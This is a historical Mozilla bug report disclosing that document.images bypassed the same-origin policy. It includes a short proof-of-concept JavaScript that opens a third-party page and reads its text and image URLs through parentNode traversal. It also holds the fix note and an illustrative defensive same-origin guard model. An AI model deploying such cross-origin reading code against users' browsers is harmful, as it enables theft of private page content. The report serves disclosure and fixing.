Closed
Bug 17537
Opened 25 years ago
Closed 25 years ago
document.images vulnerabilities
Categories
(Core :: Security, defect, P3)
Tracking
VERIFIED
FIXED
M14
People
(Reporter: joro, Assigned: norrisboyd)
Details
document.images is not protected by "Same origin" security policy, which leads
to the following vulnerabilities:
1) Exposing the DOM of arbitrary documents (by using "parentNode") - at least
reading arbitrary documents
2) Browsing the images of arbitrary documents.
The code is:
----------------------------------------------------------
function f(o)
{
  var s='';
  var i;
  s = o.nodeValue;
  if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
      s += f(o.childNodes[i]);
  return s;
}
function f2()
{
  alert("The text is:\n"+f(a.document.images[0].parentNode.parentNode.parentNode.parentNode.parentNode));
  alert("The first image is: '"+a.document.images[0].src+"'");
}
a=window.open("http://www.yahoo.com");
setTimeout("f2()",10000);
----------------------------------------------------------
Assignee • Updated 25 years ago
Status: NEW → ASSIGNED
Target Milestone: M14
Assignee • Comment 1 • 25 years ago
Made "parentNode" subject to a same-origin test.
Assignee • Updated 25 years ago
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
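The fix named in Comment 1, a same-origin test on "parentNode", modelled on a toy node tree as an added example (not code from this bug or from Mozilla). The node objects, guard(), walkUp(), the BEFORE/AFTER sets and the victim.example / other.example URLs are all hypothetical and constructed for illustration.

```javascript
// Added example: toy model of a per-property same-origin check.
// Two URLs are same-origin when scheme, host and port all match.
const sameOrigin = (a, b) => new URL(a).origin === new URL(b).origin;

// Every node remembers the URL of the document that owns it.
function makeNode(ownerUrl, nodeValue, parentNode = null) {
  return { ownerUrl, nodeValue, parentNode };
}

// Wrap a node so that reading any property named in `guarded` requires the
// calling script to be same-origin with the node's owner document. Nodes
// returned from a read are wrapped again, so the check follows the caller
// along every edge of the tree, not just the first one.
function guard(node, callerUrl, guarded) {
  return new Proxy(node, {
    get(target, prop) {
      if (guarded.has(prop) && !sameOrigin(callerUrl, target.ownerUrl)) {
        throw new Error(`same-origin check failed for "${String(prop)}"`);
      }
      const value = target[prop];
      return value !== null && typeof value === 'object'
        ? guard(value, callerUrl, guarded)
        : value;
    },
  });
}

// Constructed sample tree: body -> p -> img, all owned by victim.example.
const VICTIM = 'http://victim.example/index.html';
const body = makeNode(VICTIM, 'private text');
const para = makeNode(VICTIM, null, body);
const img = makeNode(VICTIM, null, para);

const BEFORE = new Set();               // no node property is checked
const AFTER = new Set(['parentNode']);  // traversal edge is checked

// Walk up from the image as `callerUrl`; return the text reached or 'blocked'.
function walkUp(callerUrl, guarded) {
  try {
    return guard(img, callerUrl, guarded).parentNode.parentNode.nodeValue;
  } catch (e) {
    return 'blocked';
  }
}
```

With the check on the traversal edge, a cross-origin caller that obtains one node can no longer climb from it to the rest of the document, while same-origin scripts are unaffected.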